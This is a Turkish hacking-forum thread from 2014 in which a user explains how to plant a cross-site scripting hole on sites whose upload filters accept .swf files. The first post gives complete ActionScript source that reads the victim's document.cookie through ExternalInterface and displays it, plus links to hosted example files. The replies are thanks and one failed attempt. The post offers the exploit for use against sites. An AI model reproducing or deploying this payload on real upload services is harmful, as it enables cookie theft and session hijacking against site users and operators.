Konuyu Oyla:
  • Toplam: 2 Oy - Ortalama: 3.5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: XSS Açığı Yaratma
cLowN
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 16 / 236
Deneyim: 44 / 100
Rep Sayısı: 9
Mesaj Sayısı: 130
Üyelik Tarihi: 19.08.2013
     
Yorum: #1
XSS Açığı Yaratma
16.02.2014 15:09
Arkadaşlar çoğu site upload managerı .php .asp .html... benzeri şeyleri yasaklar filitreden geçirmez kabul ettiği dosyalar .pdf .doc .txt .swf vs olan siteler vardır.Madem sistemde açık yok upload seçenekleri bunlara izin veriyor bizde kendi açığımızı yaparız.Atıyorum bu verceğim kod .swf için yazılmış bir kod

Kod:
package {
import flash.display.*;
import flash.text.*;
import flash.external.ExternalInterface;

public class xss extends Sprite {
public function xss() {
var cook:TextField = new TextField();
var res:String = ExternalInterface.call("function(){return document.cookie;}");
ExternalInterface.call("prompt(document.cookie)");
cook.multiline = true;
cook.wordWrap = true;
cook.autoSize = TextFieldAutoSize.LEFT;
cook.text = res;
addChild(cook);
}
}
}
bu dosyayı .swf formatında sisteme attığınızda örnek olarak veriyorum siteyi http://swfchan.org/2335/xss.swf xss hatası alıyorsunuz böylelikle sistemde kendi açığınızı yaratıyorsunuz.

Ör:
http://www.ziddu.com/viewfile/22413513/xss.swf.html
http://swfchan.org/2335/xss.swf
(Bu konu en son: 16.02.2014 Tarihinde, Saat: 15:10 düzenlenmiştir. Düzenleyen: cLowN.)
Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 42
Yaşam Puanı: 1,045 / 1,045
Deneyim: 81 / 100
Rep Sayısı: 1002
Mesaj Sayısı: 2958
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: XSS Açığı Yaratma
16.02.2014 15:21
eline sağlık Smile

Dört yanım ihanet, dört yanım yalan. Geçmemiş bu kış, gelmemiş bahar. Şu koca binaları üstüme yıkan gülümser önümde yüzlerce zaaf, umut her şeyden muaf. Dönmedim geri, çıkmıyor üstümden geçmişin kiri..
Alinti
cLowN
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 16 / 236
Deneyim: 44 / 100
Rep Sayısı:
Mesaj Sayısı: 130
Üyelik Tarihi: 19.08.2013
     
Yorum: #3
Cvp: XSS Açığı Yaratma
16.02.2014 15:28
bişey değil Smile
Alinti
WesT
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 12
Yaşam Puanı: 32 / 295
Deneyim: 83 / 100
Rep Sayısı: 1
Mesaj Sayısı: 190
Üyelik Tarihi: 17.12.2013
     
Yorum: #4
Cvp: XSS Açığı Yaratma
16.02.2014 18:14
eline sağlık Smile
Alinti
L3on4ns
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 6
Yaşam Puanı: 5 / 145
Deneyim: 82 / 100
Rep Sayısı: 0
Mesaj Sayısı: 63
Üyelik Tarihi: 09.12.2013
      
Yorum: #5
Cvp: XSS Açığı Yaratma
16.02.2014 20:11
http://inciswf.com/sezenss.swf denedim olmadı galiba
Alinti



1 Ziyaretçi